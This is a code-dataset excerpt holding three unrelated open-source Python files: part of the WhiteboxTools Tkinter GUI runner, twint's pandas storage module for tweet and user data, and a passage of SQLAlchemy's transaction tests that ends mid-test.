self.filemenu.add_command(label="Refresh Tools", command=self.refresh_tools)
wbt.set_compress_rasters(True)
self.filemenu.add_command(label="Do Not Compress Output TIFFs", command=self.update_compress)
self.filemenu.add_separator()
self.filemenu.add_command(label="Exit", command=self.quit)
menubar.add_cascade(label="File", menu=self.filemenu)
editmenu = tk.Menu(menubar, tearoff=0)
editmenu.add_command(label="Cut", command=lambda: self.focus_get().event_generate("<<Cut>>"))
editmenu.add_command(label="Copy", command=lambda: self.focus_get().event_generate("<<Copy>>"))
editmenu.add_command(label="Paste", command=lambda: self.focus_get().event_generate("<<Paste>>"))
menubar.add_cascade(label="Edit ", menu=editmenu)
helpmenu = tk.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About", command=self.help)
helpmenu.add_command(label="License", command=self.license)
menubar.add_cascade(label="Help ", menu=helpmenu)
self.master.config(menu=menubar)
def update_compress(self):
if wbt.get_compress_rasters():
wbt.set_compress_rasters(False)
self.filemenu.entryconfig(3, label = "Compress Output TIFFs")
else:
wbt.set_compress_rasters(True)
self.filemenu.entryconfig(3, label = "Do Not Compress Output TIFFs")
def get_toolboxes(self):
toolboxes = set()
for item in wbt.toolbox().splitlines(): # run wbt.toolbox with no tool specified--returns all
if item:
tb = item.split(":")[1].strip()
toolboxes.add(tb)
return sorted(toolboxes)
def sort_toolboxes(self):
self.upper_toolboxes = []
self.lower_toolboxes = []
for toolbox in self.toolbox_list:
if toolbox.find('/') == (-1): #Does not contain a subtoolbox, i.e. does not contain '/'
self.upper_toolboxes.append(toolbox) #add to both upper toolbox list and lower toolbox list
self.lower_toolboxes.append(toolbox)
else: #Contains a subtoolbox
self.lower_toolboxes.append(toolbox) #add to only the lower toolbox list
self.upper_toolboxes = sorted(self.upper_toolboxes) #sort both lists alphabetically
self.lower_toolboxes = sorted(self.lower_toolboxes)
def sort_tools_by_toolbox(self):
self.sorted_tools = [[] for i in range(len(self.lower_toolboxes))] #One list for each lower toolbox
count = 1
for toolAndToolbox in self.tools_and_toolboxes.split('\n'):
if toolAndToolbox.strip():
tool = toolAndToolbox.strip().split(':')[0].strip().replace("TIN", "Tin").replace("KS", "Ks").replace("FD", "Fd") #current tool
itemToolbox = toolAndToolbox.strip().split(':')[1].strip() #current toolbox
index = 0
for toolbox in self.lower_toolboxes: #find which toolbox the current tool belongs to
if toolbox == itemToolbox:
self.sorted_tools[index].append(tool) #add current tool to list at appropriate index
break
index = index + 1
count = count + 1
def get_tools_list(self):
self.tools_list = []
selected_item = -1
for item in wbt.list_tools().keys():
if item:
value = to_camelcase(item).replace("TIN", "Tin").replace("KS", "Ks").replace("FD", "Fd") #format tool name
self.tools_list.append(value) #add tool to list
if item == self.tool_name: #update selected_item it tool found
selected_item = len(self.tools_list) - 1
if selected_item == -1: #set self.tool_name as default tool
selected_item = 0
self.tool_name = self.tools_list[0]
def tree_update_tool_help(self, event): # read selection when tool selected from treeview then call self.update_tool_help
curItem = self.tool_tree.focus()
self.tool_name = self.tool_tree.item(curItem).get('text').replace(" ", "")
self.update_tool_help()
def search_update_tool_help(self, event): # read selection when tool selected from search results then call self.update_tool_help
selection = self.search_results_listbox.curselection()
self.tool_name = self.search_results_listbox.get(selection[0])
self.update_tool_help()
def update_tool_help(self):
self.out_text.delete('1.0', tk.END)
for widget in self.arg_scroll_frame.winfo_children():
widget.destroy()
k = wbt.tool_help(self.tool_name)
self.print_to_output(k)
# print(wbt.license(self.tool_name).lower())
if "proprietary" in wbt.license(self.tool_name).lower():
self.view_code_button["state"] = "disabled"
else:
self.view_code_button["state"] = "enabled"
j = json.loads(wbt.tool_parameters(self.tool_name))
param_num = 0
for p in j['parameters']:
json_str = json.dumps(
p, sort_keys=True, indent=2, separators=(',', ': '))
pt = p['parameter_type']
if 'ExistingFileOrFloat' in pt:
ff = FileOrFloat(json_str, self, self.arg_scroll_frame)
ff.grid(row=param_num, column=0, sticky=tk.NSEW)
param_num = param_num + 1
elif ('ExistingFile' in pt or 'NewFile' in pt or 'Directory' in pt):
fs = FileSelector(json_str, self, self.arg_scroll_frame)
fs.grid(row=param_num, column=0, sticky=tk.NSEW)
param_num = param_num + 1
elif 'FileList' in pt:
b = MultifileSelector(json_str, self, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.W)
param_num = param_num + 1
elif 'Boolean' in pt:
b = BooleanInput(json_str, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.W)
param_num = param_num + 1
elif 'OptionList' in pt:
b = OptionsInput(json_str, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.W)
param_num = param_num + 1
elif ('Float' in pt or 'Integer' in pt or
'String' in pt or 'StringOrNumber' in pt or
'StringList' in pt or 'VectorAttributeField' in pt):
b = DataInput(json_str, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.NSEW)
param_num = param_num + 1
else:
messagebox.showinfo(
"Error", "Unsupported parameter type: {}.".format(pt))
self.update_args_box()
self.out_text.see("%d.%d" % (1, 0))
def update_toolbox_icon(self, event):
curItem = self.tool_tree.focus()
dict = self.tool_tree.item(curItem) #retreive the toolbox name
self.toolbox_name = dict.get('text'). replace(" ", "") #delete the space between the icon and text
self.toolbox_open = dict.get('open') #retreive whether the toolbox is open or not
if self.toolbox_open == True: #set image accordingly
self.tool_tree.item(self.toolbox_name, image = self.open_toolbox_icon)
else:
self.tool_tree.item(self.toolbox_name, image = self.closed_toolbox_icon)
def update_search(self, event):
self.search_list = []
self.search_string = self.search_text.get().lower()
self.search_results_listbox.delete(0, 'end') #empty the search results
num_results = 0
for tool in self.tools_list: #search tool names
toolLower = tool.lower()
if toolLower.find(self.search_string) != (-1): #search string found within tool name
num_results = num_results + 1
self.search_results_listbox.insert(num_results, tool) #tool added to listbox and to search results string
self.search_list.append(tool)
index = 0
self.get_descriptions()
for description in self.descriptionList: #search tool descriptions
descriptionLower = description.lower()
if descriptionLower.find(self.search_string) != (-1): #search string found within tool description
found = 0
for item in self.search_list: # check if this tool is already in the listbox
if self.tools_list[index] == item:
found = 1
if found == 0: # add to listbox
num_results = num_results + 1
self.search_results_listbox.insert(num_results, self.tools_list[index]) #tool added to listbox and to search results string
index = index + 1
self.search_frame['text'] = "{} Tools Found".format(num_results) #update search label
def get_descriptions(self):
self.descriptionList = []
tools = wbt.list_tools()
toolsItems = tools.items()
for t in toolsItems:
self.descriptionList.append(t[1]) #second entry in tool dictionary is the description
# def configure_arg_scroll_frame(self, event):
# # update the scrollbars to match the size of the inner frame
# size = (self.arg_scroll_frame.winfo_reqwidth(), self.arg_scroll_frame.winfo_reqheight())
# self.arg_canvas.config(scrollregion="0 0 %s %s" % size)
# if self.arg_scroll_frame.winfo_reqwidth() != self.arg_canvas.winfo_width():
# # update the canvas's width to fit the inner frame
# self.arg_canvas.config(width=self.arg_scroll_frame.winfo_reqwidth())
# def configure_arg_canvas(self, event):
# if self.arg_scroll_frame.winfo_reqwidth() != self.arg_canvas.winfo_width():
# # update the inner frame's width to fill the canvas
# self.arg_canvas.itemconfigure(self.arg_scroll_frame_id, width=self.arg_canvas.winfo_width())
def tool_help_button(self):
index = 0
found = False
#find toolbox corresponding to the current tool
for toolbox in self.lower_toolboxes:
for tool in self.sorted_tools[index]:
if tool == self.tool_name:
self.toolbox_name = toolbox
found = True
break
if found:
break
index = index + 1
#change LiDAR to Lidar
if index == 10:
self.toolbox_name = to_camelcase(self.toolbox_name)
#format subtoolboxes as for URLs
self.toolbox_name = self.camel_to_snake(self.toolbox_name).replace('/', '').replace(' ', '')
#open the user manual section for the current tool
webbrowser.open_new_tab("https://jblindsay.github.io/wbt_book/available_tools/" + self.toolbox_name + ".html#" + self.tool_name)
def camel_to_snake(self, s): # taken from tools_info.py
_underscorer1 = re.compile(r'(.)([A-Z][a-z]+)')
_underscorer2 = re.compile('([a-z0-9])([A-Z])')
subbed = _underscorer1.sub(r'\1_\2', s)
return _underscorer2.sub(r'\1_\2', subbed).lower()
def refresh_tools(self):
#refresh lists
self.tools_and_toolboxes = wbt.toolbox('')
self.sort_tools_by_toolbox()
self.get_tools_list()
#clear self.tool_tree
self.tool_tree.delete(*self.tool_tree.get_children())
#Add toolboxes and tools to treeview
index = 0
for toolbox in self.lower_toolboxes:
if toolbox.find('/') != (-1): #toolboxes
self.tool_tree.insert(toolbox[:toolbox.find('/')], 0, text = " " + toolbox[toolbox.find('/') + 1:], iid = toolbox[toolbox.find('/') + 1:], tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within toolbox
self.tool_tree.insert(toolbox[toolbox.find('/') + 1:], 'end', text = " " + tool, tags = 'tool', iid = tool, image = self.tool_icon)
else: #subtoolboxes
self.tool_tree.insert('', 'end', text = " " + toolbox, iid = toolbox, tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within subtoolbox
self.tool_tree.insert(toolbox, 'end', text = " " + tool, iid = tool, tags = 'tool', image = self.tool_icon)
index = index + 1
#Update label
self.tools_frame["text"] = "{} Available Tools".format(len(self.tools_list))
#########################################################
# Functions (original) #
#########################################################
def help(self):
self.print_to_output(wbt.version())
def license(self):
self.print_to_output(wbt.license())
def set_directory(self):
try:
self.working_dir =filedialog.askdirectory(initialdir=self.working_dir)
wbt.set_working_dir(self.working_dir)
except:
messagebox.showinfo(
"Warning", "Could not set the working directory.")
def select_exe(self):
try:
filename = filedialog.askopenfilename(initialdir=self.exe_path)
self.exe_path = path.dirname(path.abspath(filename))
wbt.set_whitebox_dir(self.exe_path)
self.refresh_tools()
except:
messagebox.showinfo(
"Warning", "Could not find WhiteboxTools executable file.")
def run_tool(self):
# wd_str = self.wd.get_value()
wbt.set_working_dir(self.working_dir)
# args = shlex.split(self.args_value.get())
args = []
for widget in self.arg_scroll_frame.winfo_children():
v = widget.get_value()
if v:
args.append(v)
elif not widget.optional:
messagebox.showinfo(
"Error", "Non-optional tool parameter not specified.")
return
self.print_line_to_output("")
# self.print_line_to_output("Tool arguments:{}".format(args))
# self.print_line_to_output("")
# Run the tool and check the return value for an error
if wbt.run_tool(self.tool_name, args, self.custom_callback) == 1:
print("Error running {}".format(self.tool_name))
else:
self.run_button["text"] = "Run"
self.progress_var.set(0)
self.progress_label['text'] = "Progress:"
self.progress.update_idletasks()
def print_to_output(self, value):
self.out_text.insert(tk.END, value)
self.out_text.see(tk.END)
def print_line_to_output(self, value):
self.out_text.insert(tk.END, value + "\n")
self.out_text.see(tk.END)
def cancel_operation(self):
wbt.cancel_op = True
self.print_line_to_output("Cancelling operation...")
self.progress.update_idletasks()
def view_code(self):
webbrowser.open_new_tab(wbt.view_code(self.tool_name).strip())
def update_args_box(self):
s = ""
self.current_tool_lbl['text'] = "Current Tool: {}".format(
self.tool_name)
# self.spacer['width'] = width=(35-len(self.tool_name))
for item in wbt.tool_help(self.tool_name).splitlines():
if item.startswith("-"):
k = item.split(" ")
if "--" in k[1]:
value = k[1].replace(",", "")
else:
value = k[0].replace(",", "")
if "flag" in item.lower():
s = s + value + " "
else:
if "file" in item.lower():
s = s + value + "='{}' "
else:
s = s + value + "={} "
# self.args_value.set(s.strip())
def custom_callback(self, value):
''' A custom callback for dealing with tool output.
'''
if "%" in value:
try:
str_array = value.split(" ")
label = value.replace(
str_array[len(str_array) - 1], "").strip()
progress = float(
str_array[len(str_array) - 1].replace("%", "").strip())
self.progress_var.set(int(progress))
self.progress_label['text'] = label
except ValueError as e:
print("Problem converting parsed data into number: ", e)
except Exception as e:
print(e)
else:
self.print_line_to_output(value)
self.update() # this is needed for cancelling and updating the progress bar
def select_all(self, event):
self.out_text.tag_add(tk.SEL, "1.0", tk.END)
self.out_text.mark_set(tk.INSERT, "1.0")
self.out_text.see(tk.INSERT)
return 'break'
class JsonPayload(object):
def __init__(self, j):
self.__dict__ = json.loads(j)
def main():
tool_name = None
if len(sys.argv) > 1:
tool_name = str(sys.argv[1])
wbr = WbRunner(tool_name)
wbr.mainloop()
if __name__ == '__main__':
main() | 44.054805 | 207 | 0.551235 | [
"MIT"
] | luzpaz/whitebox-tools | wb_runner.py | 58,681 | Python |
import datetime, pandas as pd, warnings
from time import strftime, localtime
from twint.tweet import Tweet_formats
Tweets_df = None
Follow_df = None
User_df = None
_object_blocks = {
"tweet": [],
"user": [],
"following": [],
"followers": []
}
weekdays = {
"Monday": 1,
"Tuesday": 2,
"Wednesday": 3,
"Thursday": 4,
"Friday": 5,
"Saturday": 6,
"Sunday": 7,
}
_type = ""
def _concat(df, _type):
if df is None:
df = pd.DataFrame(_object_blocks[_type])
else:
_df = pd.DataFrame(_object_blocks[_type])
df = pd.concat([df, _df], sort=True)
return df
def _autoget(_type):
global Tweets_df
global Follow_df
global User_df
if _type == "tweet":
Tweets_df = _concat(Tweets_df, _type)
elif _type == "followers" or _type == "following":
Follow_df = _concat(Follow_df, _type)
elif _type == "user":
User_df = _concat(User_df, _type)
else:
error("[x] Wrong type of object passed")
def update(object, config):
global _type
#try:
# _type = ((object.__class__.__name__ == "tweet")*"tweet" +
# (object.__class__.__name__ == "user")*"user")
#except AttributeError:
# _type = config.Following*"following" + config.Followers*"followers"
if object.__class__.__name__ == "tweet":
_type = "tweet"
elif object.__class__.__name__ == "user":
_type = "user"
elif object.__class__.__name__ == "dict":
_type = config.Following*"following" + config.Followers*"followers"
if _type == "tweet":
Tweet = object
if 'Naoaianeia a?aiy (ceia)' in Tweet.datetime:
Tweet.datetime = Tweet.datetime[:19]
try:
datetime_ms = datetime.datetime.strptime(Tweet.datetime, Tweet_formats['datetime']).timestamp() * 1000
except:
datetime_ms = datetime.datetime.strptime(Tweet.datetime, '%Y-%m-%d %H:%M:%S').timestamp() * 1000
day = weekdays[strftime("%A", localtime(datetime_ms/1000))]
dt = f"{object.datestamp} {object.timestamp}"
_data = {
"id": str(Tweet.id),
"conversation_id": Tweet.conversation_id,
"created_at": datetime_ms,
"date": dt,
"timezone": Tweet.timezone,
"place": Tweet.place,
"tweet": Tweet.tweet,
"language": Tweet.lang,
"hashtags": Tweet.hashtags,
"cashtags": Tweet.cashtags,
"user_id": Tweet.user_id,
"user_id_str": Tweet.user_id_str,
"username": Tweet.username,
"name": Tweet.name,
"day": day,
"hour": strftime("%H", localtime(datetime_ms/1000)),
"link": Tweet.link,
"urls": Tweet.urls,
"photos": Tweet.photos,
"video": Tweet.video,
"thumbnail": Tweet.thumbnail,
"retweet": Tweet.retweet,
"nlikes": int(Tweet.likes_count),
"nreplies": int(Tweet.replies_count),
"nretweets": int(Tweet.retweets_count),
"quote_url": Tweet.quote_url,
"search": str(config.Search),
"near": Tweet.near,
"geo": Tweet.geo,
"source": Tweet.source,
"user_rt_id": Tweet.user_rt_id,
"user_rt": Tweet.user_rt,
"retweet_id": Tweet.retweet_id,
"reply_to": Tweet.reply_to,
"retweet_date": Tweet.retweet_date,
"translate": Tweet.translate,
"trans_src": Tweet.trans_src,
"trans_dest": Tweet.trans_dest
}
_object_blocks[_type].append(_data)
elif _type == "user":
user = object
try:
background_image = user.background_image
except:
background_image = ""
_data = {
"id": user.id,
"name": user.name,
"username": user.username,
"bio": user.bio,
"url": user.url,
"join_datetime": user.join_date + " " + user.join_time,
"join_date": user.join_date,
"join_time": user.join_time,
"tweets": user.tweets,
"location": user.location,
"following": user.following,
"followers": user.followers,
"likes": user.likes,
"media": user.media_count,
"private": user.is_private,
"verified": user.is_verified,
"avatar": user.avatar,
"background_image": background_image,
}
_object_blocks[_type].append(_data)
elif _type == "followers" or _type == "following":
_data = {
config.Following*"following" + config.Followers*"followers" :
{config.Username: object[_type]}
}
_object_blocks[_type] = _data
else:
print("Wrong type of object passed!")
def clean():
global Tweets_df
global Follow_df
global User_df
_object_blocks["tweet"].clear()
_object_blocks["following"].clear()
_object_blocks["followers"].clear()
_object_blocks["user"].clear()
Tweets_df = None
Follow_df = None
User_df = None
def save(_filename, _dataframe, **options):
if options.get("dataname"):
_dataname = options.get("dataname")
else:
_dataname = "twint"
if not options.get("type"):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_store = pd.HDFStore(_filename + ".h5")
_store[_dataname] = _dataframe
_store.close()
elif options.get("type") == "Pickle":
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_dataframe.to_pickle(_filename + ".pkl")
else:
print("""Please specify: filename, DataFrame, DataFrame name and type
(HDF5, default, or Pickle)""")
def read(_filename, **options):
if not options.get("dataname"):
_dataname = "twint"
else:
_dataname = options.get("dataname")
if not options.get("type"):
_store = pd.HDFStore(_filename + ".h5")
_df = _store[_dataname]
return _df
elif options.get("type") == "Pickle":
_df = pd.read_pickle(_filename + ".pkl")
return _df
else:
print("""Please specify: DataFrame, DataFrame name (twint as default),
filename and type (HDF5, default, or Pickle""")
| 32.20297 | 114 | 0.558493 | [
"MIT"
] | hellpanderrr/twint | twint/storage/panda.py | 6,505 | Python |
import sys
from sqlalchemy import create_engine
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import INT
from sqlalchemy import MetaData
from sqlalchemy import pool as _pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy import util
from sqlalchemy import VARCHAR
from sqlalchemy.engine import base
from sqlalchemy.engine import characteristics
from sqlalchemy.engine import default
from sqlalchemy.engine import url
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
class TransactionTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
@testing.fixture
def local_connection(self):
with testing.db.connect() as conn:
yield conn
def test_commits(self, local_connection):
users = self.tables.users
connection = local_connection
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
transaction.commit()
transaction = connection.begin()
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.commit()
transaction = connection.begin()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 3
transaction.commit()
connection.close()
def test_rollback(self, local_connection):
"""test a basic rollback"""
users = self.tables.users
connection = local_connection
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.rollback()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 0
def test_raise(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
try:
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=1, user_name="user3")
transaction.commit()
assert False
except Exception as e:
print("Exception: ", e)
transaction.rollback()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 0
def test_deactivated_warning_ctxmanager(self, local_connection):
with expect_warnings(
"transaction already deassociated from connection"
):
with local_connection.begin() as trans:
trans.rollback()
@testing.requires.savepoints
def test_deactivated_savepoint_warning_ctxmanager(self, local_connection):
with expect_warnings(
"nested transaction already deassociated from connection"
):
with local_connection.begin():
with local_connection.begin_nested() as savepoint:
savepoint.rollback()
def test_commit_fails_flat(self, local_connection):
connection = local_connection
t1 = connection.begin()
with mock.patch.object(
connection,
"_commit_impl",
mock.Mock(side_effect=exc.DBAPIError("failure", None, None, None)),
):
assert_raises_message(exc.DBAPIError, r"failure", t1.commit)
assert not t1.is_active
t1.rollback() # no error
def test_commit_fails_ctxmanager(self, local_connection):
connection = local_connection
transaction = [None]
def go():
with mock.patch.object(
connection,
"_commit_impl",
mock.Mock(
side_effect=exc.DBAPIError("failure", None, None, None)
),
):
with connection.begin() as t1:
transaction[0] = t1
assert_raises_message(exc.DBAPIError, r"failure", go)
t1 = transaction[0]
assert not t1.is_active
with expect_warnings(
"transaction already deassociated from connection"
):
t1.rollback() # no error
@testing.requires.savepoints_w_release
def test_savepoint_rollback_fails_flat(self, local_connection):
connection = local_connection
t1 = connection.begin()
s1 = connection.begin_nested()
# force the "commit" of the savepoint that occurs
# when the "with" block fails, e.g.
# the RELEASE, to fail, because the savepoint is already
# released.
connection.dialect.do_release_savepoint(connection, s1._savepoint)
assert_raises_message(
exc.DBAPIError, r".*SQL\:.*ROLLBACK TO SAVEPOINT", s1.rollback
)
assert not s1.is_active
with testing.expect_warnings("nested transaction already"):
s1.rollback() # no error (though it warns)
t1.commit() # no error
@testing.requires.savepoints_w_release
def test_savepoint_release_fails_flat(self):
with testing.db.connect() as connection:
t1 = connection.begin()
s1 = connection.begin_nested()
# force the "commit" of the savepoint that occurs
# when the "with" block fails, e.g.
# the RELEASE, to fail, because the savepoint is already
# released.
connection.dialect.do_release_savepoint(connection, s1._savepoint)
assert_raises_message(
exc.DBAPIError, r".*SQL\:.*RELEASE SAVEPOINT", s1.commit
)
assert not s1.is_active
s1.rollback() # no error. prior to 1.4 this would try to rollback
t1.commit() # no error
@testing.requires.savepoints_w_release
def test_savepoint_release_fails_ctxmanager(self, local_connection):
connection = local_connection
connection.begin()
savepoint = [None]
def go():
with connection.begin_nested() as sp:
savepoint[0] = sp
# force the "commit" of the savepoint that occurs
# when the "with" block fails, e.g.
# the RELEASE, to fail, because the savepoint is already
# released.
connection.dialect.do_release_savepoint(
connection, sp._savepoint
)
# prior to SQLAlchemy 1.4, the above release would fail
# and then the savepoint would try to rollback, and that failed
# also, causing a long exception chain that under Python 2
# was particularly hard to diagnose, leading to issue
# #2696 which eventually impacted Openstack, and we
# had to add warnings that show what the "context" for an
# exception was. The SQL for the exception was
# ROLLBACK TO SAVEPOINT, and up the exception chain would be
# the RELEASE failing.
#
# now, when the savepoint "commit" fails, it sets itself as
# inactive. so it does not try to rollback and it cleans
# itself out appropriately.
#
exc_ = assert_raises_message(
exc.DBAPIError, r".*SQL\:.*RELEASE SAVEPOINT", go
)
savepoint = savepoint[0]
assert not savepoint.is_active
if util.py3k:
# ensure cause comes from the DBAPI
assert isinstance(exc_.__cause__, testing.db.dialect.dbapi.Error)
def test_retains_through_options(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
conn2 = connection.execution_options(dummy=True)
conn2.execute(users.insert(), user_id=2, user_name="user2")
transaction.rollback()
eq_(
connection.exec_driver_sql("select count(*) from users").scalar(),
0,
)
def test_with_interface(self, local_connection):
connection = local_connection
users = self.tables.users
trans = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
try:
connection.execute(users.insert(), user_id=2, user_name="user2.5")
except Exception:
trans.__exit__(*sys.exc_info())
assert not trans.is_active
self.assert_(
connection.exec_driver_sql(
"select count(*) from " "users"
).scalar()
== 0
)
trans = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
trans.__exit__(None, None, None)
assert not trans.is_active
self.assert_(
connection.exec_driver_sql(
"select count(*) from " "users"
).scalar()
== 1
)
def test_close(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
assert connection.in_transaction()
transaction.commit()
assert not connection.in_transaction()
result = connection.exec_driver_sql("select * from users")
eq_(len(result.fetchall()), 3)
def test_close2(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
assert connection.in_transaction()
transaction.close()
assert not connection.in_transaction()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 0
@testing.requires.savepoints
def test_nested_subtransaction_rollback(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
trans2 = connection.begin_nested()
connection.execute(users.insert(), user_id=2, user_name="user2")
trans2.rollback()
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.commit()
eq_(
connection.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,), (3,)],
)
@testing.requires.savepoints
def test_nested_subtransaction_commit(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
trans2 = connection.begin_nested()
connection.execute(users.insert(), user_id=2, user_name="user2")
trans2.commit()
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.commit()
eq_(
connection.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,), (2,), (3,)],
)
@testing.requires.two_phase_transactions
def test_two_phase_transaction(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=1, user_name="user1")
transaction.prepare()
transaction.commit()
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=2, user_name="user2")
transaction.commit()
transaction.close()
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.rollback()
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=4, user_name="user4")
transaction.prepare()
transaction.rollback()
transaction.close()
eq_(
connection.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,), (2,)],
)
@testing.requires.two_phase_transactions
@testing.requires.two_phase_recovery
def test_two_phase_recover(self):
users = self.tables.users
# 2020, still can't get this to work w/ modern MySQL or MariaDB.
# the XA RECOVER comes back as bytes, OK, convert to string,
# XA COMMIT then says Unknown XID. Also, the drivers seem to be
# killing off the XID if I use the connection.invalidate() before
# trying to access in another connection. Not really worth it
# unless someone wants to step through how mysqlclient / pymysql
# support this correctly.
connection = testing.db.connect()
transaction = connection.begin_twophase()
connection.execute(users.insert(), dict(user_id=1, user_name="user1"))
transaction.prepare()
connection.invalidate()
with testing.db.connect() as connection2:
eq_(
connection2.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[],
)
# recover_twophase needs to be run in a new transaction
with testing.db.connect() as connection2:
recoverables = connection2.recover_twophase()
assert transaction.xid in recoverables
connection2.commit_prepared(transaction.xid, recover=True)
eq_(
connection2.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,)],
)
@testing.requires.two_phase_transactions
def test_multiple_two_phase(self, local_connection):
conn = local_connection
users = self.tables.users
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=1, user_name="user1")
xa.prepare()
xa.commit()
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=2, user_name="user2")
xa.prepare()
xa.rollback()
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=3, user_name="user3")
xa.rollback()
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=4, user_name="user4")
xa.prepare()
xa.commit()
result = conn.execute(
select(users.c.user_name).order_by(users.c.user_id)
)
eq_(result.fetchall(), [("user1",), ("user4",)])
@testing.requires.two_phase_transactions
def test_reset_rollback_two_phase_no_rollback(self):
# test [ticket:2907], essentially that the
# TwoPhaseTransaction is given the job of "reset on return"
# so that picky backends like MySQL correctly clear out
# their state when a connection is closed without handling
# the transaction explicitly.
users = self.tables.users
eng = testing_engine()
# MySQL raises if you call straight rollback() on
# a connection with an XID present
@event.listens_for(eng, "invalidate")
def conn_invalidated(dbapi_con, con_record, exception):
dbapi_con.close()
raise exception
with eng.connect() as conn:
rec = conn.connection._connection_record
raw_dbapi_con = rec.connection
conn.begin_twophase()
conn.execute(users.insert(), user_id=1, user_name="user1")
assert rec.connection is raw_dbapi_con
with eng.connect() as conn:
result = conn.execute(
select(users.c.user_name).order_by(users.c.user_id)
)
eq_(result.fetchall(), [])
class ResetAgentTest(fixtures.TestBase):
__backend__ = True
def test_begin_close(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
assert not trans.is_active
def test_begin_rollback(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
def test_begin_commit(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
def test_trans_close(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.close()
assert connection.connection._reset_agent is None
def test_trans_reset_agent_broken_ensure(self):
eng = testing_engine()
conn = eng.connect()
trans = conn.begin()
assert conn.connection._reset_agent is trans
trans.is_active = False
with expect_warnings("Reset agent is not active"):
conn.close()
def test_trans_commit_reset_agent_broken_ensure_pool(self):
eng = testing_engine(options={"pool_reset_on_return": "commit"})
conn = eng.connect()
trans = conn.begin()
assert conn.connection._reset_agent is trans
trans.is_active = False
with expect_warnings("Reset agent is not active"):
conn.close()
@testing.requires.savepoints
def test_begin_nested_trans_close_one(self):
with testing.db.connect() as connection:
t1 = connection.begin()
assert connection.connection._reset_agent is t1
t2 = connection.begin_nested()
assert connection.connection._reset_agent is t1
assert connection._nested_transaction is t2
assert connection._transaction is t1
t2.close()
assert connection._nested_transaction is None
assert connection._transaction is t1
assert connection.connection._reset_agent is t1
t1.close()
assert connection.connection._reset_agent is None
assert not t1.is_active
@testing.requires.savepoints
def test_begin_nested_trans_close_two(self):
with testing.db.connect() as connection:
t1 = connection.begin()
assert connection.connection._reset_agent is t1
t2 = connection.begin_nested()
assert connection.connection._reset_agent is t1
assert connection._nested_transaction is t2
assert connection._transaction is t1
assert connection.connection._reset_agent is t1
t1.close()
assert connection._nested_transaction is None
